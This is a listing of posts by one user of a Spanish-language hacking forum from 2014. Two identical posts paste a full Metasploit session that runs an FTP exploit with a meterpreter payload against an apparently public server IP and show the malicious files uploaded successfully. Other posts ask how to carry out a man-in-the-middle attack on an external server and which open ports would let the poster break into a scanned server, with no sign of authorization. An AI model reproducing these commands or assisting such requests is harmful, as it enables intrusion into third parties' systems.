| |
 Mostrar Mensajes
|
|
Páginas: [1]
|
|
1
|
Seguridad Informática / Bugs y Exploits / Explicacion de un exploit.
|
en: 9 Septiembre 2014, 16:12 pm
|
Buenas.. Ayer desde Armitage corriendo el sistema operativo de Kali linux, ejecute un Exploit para un servidor que corría el servicio de FTP, el tema es que sinceramente no entiendo el funcionamiento del mismo. Espero que alguien me pueda explicar. GRACIAS! msf > use exploit/windows/ftp/open_ftpd_wbem
msf exploit(open_ftpd_wbem) > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(open_ftpd_wbem) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(open_ftpd_wbem) > set RPORT 21
RPORT => 21
msf exploit(open_ftpd_wbem) > set LPORT 15498
LPORT => 15498
msf exploit(open_ftpd_wbem) > set SSL 0
SSL => 0
msf exploit(open_ftpd_wbem) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(open_ftpd_wbem) > set RHOST (IP DEL SERVIDOR)
RHOST => 190.183.59.228
msf exploit(open_ftpd_wbem) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(open_ftpd_wbem) > set TARGET 0
TARGET => 0
msf exploit(open_ftpd_wbem) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(open_ftpd_wbem) > set PATH C:/WINDOWS/
PATH => C:/WINDOWS/
msf exploit(open_ftpd_wbem) > exploit -j
- Exploit running as background job.
- Started bind handler
- Server started.
- (IPSERVIDOR):21 - Trying to upload ctBqvLiiKaTFnm.exe
- (IPSERVIDOR):21 - Set binary mode
- (IPSERVIDOR)21 - Set active mode "192,168,0,11,31,144"
- (IPSERVIDOR):21 - Upload successful
- (IPSERVIDOR):21 - Trying to upload dwEoqTj.mof
- (IPSERVIDOR):21 - Set binary mode
- (IPSERVIDOR):21 - Set active mode "192,168,0,11,31,144"
- (IPSERVIDOR):21 - Upload successful[/b][/i]
|
|
|
|
|
2
|
Seguridad Informática / Hacking / DUDA. Man in de Middle
|
en: 7 Septiembre 2014, 16:42 pm
|
|
Buenas, mi duda es la siguiente se puede realizar un ataque de "man in de middle" a un servidor externo que no este dentro de la misma red? si es posible como realizar este ataque?. Muchas Gracias
|
|
|
|
|
3
|
Seguridad Informática / Hacking / Explicacion de un exploit. ayuda.
|
en: 7 Septiembre 2014, 16:38 pm
|
Buenas.. Ayer desde Armitage corriendo el sistema operativo de Kali linux, ejecute un Exploit para un servidor que corría el servicio de FTP, el tema es que sinceramente no entiendo el funcionamiento del mismo. Espero que alguien me pueda explicar. GRACIAS! msf > use exploit/windows/ftp/open_ftpd_wbem
msf exploit(open_ftpd_wbem) > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(open_ftpd_wbem) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(open_ftpd_wbem) > set RPORT 21
RPORT => 21
msf exploit(open_ftpd_wbem) > set LPORT 15498
LPORT => 15498
msf exploit(open_ftpd_wbem) > set SSL 0
SSL => 0
msf exploit(open_ftpd_wbem) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(open_ftpd_wbem) > set RHOST (IP DEL SERVIDOR)
RHOST => 190.183.59.228
msf exploit(open_ftpd_wbem) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(open_ftpd_wbem) > set TARGET 0
TARGET => 0
msf exploit(open_ftpd_wbem) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(open_ftpd_wbem) > set PATH C:/WINDOWS/
PATH => C:/WINDOWS/
msf exploit(open_ftpd_wbem) > exploit -j
- Exploit running as background job.
- Started bind handler
- Server started.
- (IPSERVIDOR):21 - Trying to upload ctBqvLiiKaTFnm.exe
- (IPSERVIDOR):21 - Set binary mode
- (IPSERVIDOR)21 - Set active mode "192,168,0,11,31,144"
- (IPSERVIDOR):21 - Upload successful
- (IPSERVIDOR):21 - Trying to upload dwEoqTj.mof
- (IPSERVIDOR):21 - Set binary mode
- (IPSERVIDOR):21 - Set active mode "192,168,0,11,31,144"
- (IPSERVIDOR):21 - Upload successful[/b][/i]
|
|
|
|
|
5
|
Sistemas Operativos / GNU/Linux / TOR/VIDALIA. Errores avanzados. Kali linux.
|
en: 6 Septiembre 2014, 02:28 am
|
Buenas, necesito ayuda con estos programas, hace unos dias que me lo descargue y lo pude usar solo una vez, reinicie el sistema y al prender el programa me tiro un mensaje diciendo que vea precisamente los "Message Log" y encontré esto: 
Sep 05 21:20:06.274 [Notice] Tor v0.2.4.23 (git-417f0cacd726e549) running on Linux with Libevent 2.0.19-stable and OpenSSL 1.0.1e.
Sep 05 21:20:06.274 [Notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Sep 05 21:20:06.274 [Notice] Read configuration file "/root/.vidalia/torrc".
Sep 05 21:20:06.275 [Notice] Opening Socks listener on 127.0.0.1:9050
Sep 05 21:20:06.275 [Warning] Directory /var/run/tor does not exist.
Sep 05 21:20:06.275 [Warning] Before Tor can create a control socket in "/var/run/tor/control", the directory "/var/run/tor" needs to exist, and to be accessible only by the user account that is running Tor. (On some Unix systems, anybody who can list a socket can connect to it, so Tor is being careful.)
Sep 05 21:20:06.275 [Notice] Closing partially-constructed Socks listener on 127.0.0.1:9050
Sep 05 21:20:06.275 [Warning] Failed to parse/validate config: Failed to bind one of the listener ports.
Sep 05 21:20:06.275 [Error] Reading config failed--see warnings above.Sinceramente me gustaría poder seguir utilizando la aplicación y que me den una mano. Muchas gracias de antemano.  |
|
|
|
|
6
|
Seguridad Informática / Hacking / Kali Linux, Hacking a servidor. (Dudas)
|
en: 31 Agosto 2014, 22:38 pm
|
|
Buenas tardes, estoy actualizandome un poco con el tema de seguridad informatica puesto que hace años que la abandone.
Recientemente estoy probando Kali Linux y tengo unas dudas con si hay vulnerabilidades para penetrar por los siguiente puertos. Gracias de antemano..
El servidor tiene abierto los siguiente puertos:
20/tcp closed ftp-data
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp closed imap
443/tcp open https
587/tcp open submission
1010/tcp open surf
1433/tcp open ms-sql-s
1723/tcp closed pptp
2222/tcp closed EtherNet/IP-1
2525/tcp open ms-v-worlds
3306/tcp open mysql
8080/tcp closed http-proxy
8086/tcp closed d-s-n
9001/tcp closed tor-orport
Espero que puedan ayudarme..
|
|
|
|
|
|
| |
|
